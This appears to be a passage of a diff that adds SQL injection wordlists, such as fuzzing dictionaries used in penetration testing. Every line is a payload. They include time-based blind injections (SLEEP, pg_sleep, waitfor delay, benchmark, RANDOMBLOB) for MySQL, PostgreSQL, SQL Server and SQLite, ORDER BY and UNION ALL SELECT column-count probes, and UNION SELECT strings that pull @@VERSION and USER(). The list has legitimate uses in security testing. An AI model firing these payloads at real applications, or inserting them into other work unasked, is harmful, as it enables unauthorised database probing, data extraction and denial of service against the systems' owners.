'));waitfor delay '0:0:5'--
|
||||||
|
"));waitfor delay '0:0:5'--
|
||||||
|
benchmark(10000000,MD5(1))#
|
||||||
|
1 or benchmark(10000000,MD5(1))#
|
||||||
|
" or benchmark(10000000,MD5(1))#
|
||||||
|
' or benchmark(10000000,MD5(1))#
|
||||||
|
1) or benchmark(10000000,MD5(1))#
|
||||||
|
") or benchmark(10000000,MD5(1))#
|
||||||
|
') or benchmark(10000000,MD5(1))#
|
||||||
|
1)) or benchmark(10000000,MD5(1))#
|
||||||
|
")) or benchmark(10000000,MD5(1))#
|
||||||
|
')) or benchmark(10000000,MD5(1))#
|
||||||
|
pg_sleep(5)--
|
||||||
|
1 or pg_sleep(5)--
|
||||||
|
" or pg_sleep(5)--
|
||||||
|
' or pg_sleep(5)--
|
||||||
|
1) or pg_sleep(5)--
|
||||||
|
") or pg_sleep(5)--
|
||||||
|
') or pg_sleep(5)--
|
||||||
|
1)) or pg_sleep(5)--
|
||||||
|
")) or pg_sleep(5)--
|
||||||
|
')) or pg_sleep(5)--
|
||||||
|
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
|
||||||
|
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
|
||||||
|
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
|
||||||
|
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
|
||||||
|
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
|
||||||
|
SLEEP(5)#
|
||||||
|
SLEEP(5)--
|
||||||
|
SLEEP(5)="
|
||||||
|
SLEEP(5)='
|
||||||
|
or SLEEP(5)
|
||||||
|
or SLEEP(5)#
|
||||||
|
or SLEEP(5)--
|
||||||
|
or SLEEP(5)="
|
||||||
|
or SLEEP(5)='
|
||||||
|
waitfor delay '00:00:05'
|
||||||
|
waitfor delay '00:00:05'--
|
||||||
|
waitfor delay '00:00:05'#
|
||||||
|
benchmark(50000000,MD5(1))
|
||||||
|
benchmark(50000000,MD5(1))--
|
||||||
|
benchmark(50000000,MD5(1))#
|
||||||
|
or benchmark(50000000,MD5(1))
|
||||||
|
or benchmark(50000000,MD5(1))--
|
||||||
|
or benchmark(50000000,MD5(1))#
|
||||||
|
pg_SLEEP(5)
|
||||||
|
pg_SLEEP(5)--
|
||||||
|
pg_SLEEP(5)#
|
||||||
|
or pg_SLEEP(5)
|
||||||
|
or pg_SLEEP(5)--
|
||||||
|
or pg_SLEEP(5)#
|
||||||
|
'\"
|
||||||
|
AnD SLEEP(5)
|
||||||
|
AnD SLEEP(5)--
|
||||||
|
AnD SLEEP(5)#
|
||||||
|
&&SLEEP(5)
|
||||||
|
&&SLEEP(5)--
|
||||||
|
&&SLEEP(5)#
|
||||||
|
' AnD SLEEP(5) ANd '1
|
||||||
|
'&&SLEEP(5)&&'1
|
||||||
|
ORDER BY SLEEP(5)
|
||||||
|
ORDER BY SLEEP(5)--
|
||||||
|
ORDER BY SLEEP(5)#
|
||||||
|
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
|
||||||
|
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
|
||||||
|
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
|
||||||
|
+benchmark(3200,SHA1(1))+'
|
||||||
|
+ SLEEP(10) + '
|
||||||
|
RANDOMBLOB(500000000/2)
|
||||||
|
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
|
||||||
|
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
|
||||||
|
RANDOMBLOB(1000000000/2)
|
||||||
|
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
|
||||||
|
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
|
||||||
|
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
|
@ -0,0 +1,424 @@
|
||||||
|
ORDER BY SLEEP(5)
|
||||||
|
ORDER BY 1,SLEEP(5)
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
|
||||||
|
ORDER BY SLEEP(5)#
|
||||||
|
ORDER BY 1,SLEEP(5)#
|
||||||
|
ORDER BY 1,SLEEP(5),3#
|
||||||
|
ORDER BY 1,SLEEP(5),3,4#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
|
||||||
|
ORDER BY SLEEP(5)--
|
||||||
|
ORDER BY 1,SLEEP(5)--
|
||||||
|
ORDER BY 1,SLEEP(5),3--
|
||||||
|
ORDER BY 1,SLEEP(5),3,4--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
|
||||||
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
|
||||||
|
UNION ALL SELECT 1
|
||||||
|
UNION ALL SELECT 1,2
|
||||||
|
UNION ALL SELECT 1,2,3
|
||||||
|
UNION ALL SELECT 1,2,3,4
|
||||||
|
UNION ALL SELECT 1,2,3,4,5
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
|
||||||
|
UNION ALL SELECT 1#
|
||||||
|
UNION ALL SELECT 1,2#
|
||||||
|
UNION ALL SELECT 1,2,3#
|
||||||
|
UNION ALL SELECT 1,2,3,4#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
|
||||||
|
UNION ALL SELECT 1--
|
||||||
|
UNION ALL SELECT 1,2--
|
||||||
|
UNION ALL SELECT 1,2,3--
|
||||||
|
UNION ALL SELECT 1,2,3,4--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
|
||||||
|
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),3
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),4
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
|
||||||
|
